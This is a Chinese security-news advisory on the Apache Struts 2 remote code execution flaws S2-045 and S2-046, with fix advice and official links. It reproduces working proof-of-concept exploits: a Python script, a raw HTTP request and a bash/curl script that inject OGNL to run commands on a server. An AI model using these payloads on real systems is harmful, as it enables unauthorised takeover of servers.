s2-045

s2-045
首页
文章

漏洞
SRC导航
内容精选

输入关键词搜索

APP 登录| 注册
【重大漏洞预警】Struts 2 远程代码执行漏洞(s2-045s2-046) (含PoC)
阅读量 275446 |

分享到： QQ空间新浪微博微信 QQ facebook twitter
发布时间：2017-03-21 09:58:06
http://p6.qhimg.com/t012e9f69bc74def9ff.png

背景介绍

近日，安全研究人员发现著名J2EE框架——Struts2存在远程代码执行的漏洞，Struts2官方已经确认该漏洞（S2-045,S2-046），并定级为高危漏洞。

Struts2 的使用范围及其广泛，国内外均有大量厂商使用该框架。

Struts2是一个基于MVC设计模式的Web应用框架，它本质上相当于一个servlet，在MVC设计模式中，Struts2作为控制器(Controller)来建立模型与视图的数据交互。Struts 2是Struts的下一代产品，是在 struts 1和WebWork的技术基础上进行了合并的全新的Struts 2框架。（来源：百度百科）

漏洞描述

使用Jakarta插件处理文件上传操作时可能导致远程代码执行漏洞。

http://p9.qhimg.com/t0180d967ced28d63f5.png

S2-045漏洞影响

攻击者可以通过构造HTTP请求头中的Content-Type值可能造成远程代码执行。

S2-045PoC_1（来源于网络：http://www.cnblogs.com/milantgh/p/6512739.html ）

#! /usr/bin/env python
# encoding:utf-8
import urllib2
import sys
from poster.encode import multipart_encode
from poster.streaminghttp import register_openers
def poc():
register_openers()
datagen, header = multipart_encode({"image1": open("tmp.txt", "rb")})
header["User-Agent"]="Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.87 Safari/537.36"
header["Content-Type"]="%{(#nike='multipart/form-data').(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#cmd='ifconfig').(#iswin=(@java.lang.System@getProperty('os.name').toLowerCase().contains('win'))).(#cmds=(#iswin?{'cmd.exe','/c',#cmd}:{'/bin/bash','-c',#cmd})).(#p=new java.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream(true)).(#process=#p.start()).(#ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream())).(@org.apache.commons.io.IOUtils@copy(#process.getInputStream(),#ros)).(#ros.flush())}"
request = urllib2.Request(str(sys.argv[1]),datagen,headers=header)
response = urllib2.urlopen(request)
print response.read()
poc()

S2-046漏洞影响（更新）

触发条件

上传文件的大小（由Content-Length头指定）大于Struts2默认允许的最大大小（2M）。

header中的Content-Disposition中包含空字节。

文件名内容构造恶意的OGNL内容。

S2-046PoC（来源于网络：https://community.hpe.com/t5/Security-Research/Struts2-046-A-new-vector/ba-p/6949723# ）

需要在strust.xml中加入才能触发。

POST /doUpload.action HTTP/1.1
Host: localhost:8080
Content-Length: 10000000
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryAnmUgTEhFhOZpr9z
Connection: close

------WebKitFormBoundaryAnmUgTEhFhOZpr9z
Content-Disposition: form-data; name="upload"; filename="%{#context['com.opensymphony.xwork2.dispatcher.HttpServletResponse'].addHeader('X-Test','Kaboom')}"
Content-Type: text/plain
Kaboom

------WebKitFormBoundaryAnmUgTEhFhOZpr9z--

S2-046PoC_2（来源于网络：https://gist.githubusercontent.com/frohoff/a3e24764561c0c18b6270805140e7600 ）

#!/bin/bash

url=$1
cmd=$2
shift
shift

boundary="---------------------------735323031399963166993862150"
content_type="multipart/form-data; boundary=$boundary"
payload=$(echo "%{(#nike='multipart/form-data').(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#cmd='"$cmd"').(#iswin=(@java.lang.System@getProperty('os.name').toLowerCase().contains('win'))).(#cmds=(#iswin?{'cmd.exe','/c',#cmd}:{'/bin/bash','-c',#cmd})).(#p=new java.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream(true)).(#process=#p.start()).(#ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream())).(@org.apache.commons.io.IOUtils@copy(#process.getInputStream(),#ros)).(#ros.flush())}")

printf -- "--$boundaryrnContent-Disposition: form-data; name="foo"; filename="%sb"rnContent-Type: text/plainrnrnxrn--$boundary--rnrn" "$payload" | curl "$url" -H "Content-Type: $content_type" -H "Expect: " -H "Connection: close" --data-binary @- $@
验证截图

https://p2.ssl.qhimg.com/t01203e6ee0e6688c16.png

修复建议

1. 严格过滤 Content-Type 、filename里的内容，严禁ognl表达式相关字段。

2. 如果您使用基于Jakarta插件，请升级到Apache Struts 2.3.32或2.5.10.1版本。（强烈推荐）

官网公告

https://cwiki.apache.org/confluence/display/WW/S2-045

https://cwiki.apache.org/confluence/display/WW/S2-046

补丁地址

Struts 2.3.32：https://cwiki.apache.org/confluence/display/WW/Version+Notes+2.3.32

Struts 2.5.10.1：https://cwiki.apache.org/confluence/display/WW/Version+Notes+2.5.10.1

参考

http://struts.apache.org/docs/s2-045.html

http://struts.apache.org/docs/s2-046.html

https://gist.githubusercontent.com/frohoff/a3e24764561c0c18b6270805140e7600

https://community.hpe.com/t5/Security-Research/Struts2-046-A-new-vector/ba-p/6949723#

本文由安全客原创发布
转载，请参考转载声明，注明出处： https://www.anquanke.com/post/id/85744
安全客 - 有思想的安全新媒体
安全知识

安全客官方小编分享到： QQ空间新浪微博微信 QQ facebook twitter
|推荐阅读

ARM汇编之堆栈溢出实战分析四(GDB)
2019-02-19 16:00:28

盲眼鹰（APT-C-36）：持续针对哥伦比亚政企机构的攻击活动揭露
2019-02-19 14:33:15

从两道CTF实例看python格式化字符串漏洞
2019-02-19 14:30:48

Typora XSS 到 RCE（下）
2019-02-19 11:30:28
|发表评论
发表你的评论吧
昵称
Dir溢出大神
换一个
|评论列表
还没有评论呢，快去抢个沙发吧~
安全客
有思想的安全新媒体
文章
1132
粉丝
51
TA的文章
256万人脸识别数据遭泄露，“脸”还安全吗？
2019-02-15 19:22:33
日政府授权入侵公民物联网设备
2019-02-01 13:49:08
360网络安全周报第195期
2019-01-25 18:18:17
拼多多：关于“黑灰产通过平台优惠券漏洞不正当牟利”的声明
2019-01-20 14:18:46
360网络安全周报第193期
2019-01-13 11:07:25
输入关键字搜索内容
相关文章
360 | 数字货币钱包APP安全威胁概况
以太坊智能合约安全入门了解一下（下）
对恶意勒索软件Samsam多个变种的深入分析
360 | 数字货币钱包安全白皮书
Json Web Token历险记
揪出底层的幽灵：深挖寄生灵Ⅱ
简单五步教你如何绕过安全狗
热门推荐
安全客Logo
安全客
安全客
关于我们
加入我们
联系我们
用户协议
商务合作
合作内容
联系方式
友情链接
内容须知
投稿须知
转载须知
合作单位
安全客
安全客
Copyright © 360网络攻防实验室 All Rights Reserved 京ICP备08010314号-66
Loading...0daybank

s2-045

文章评论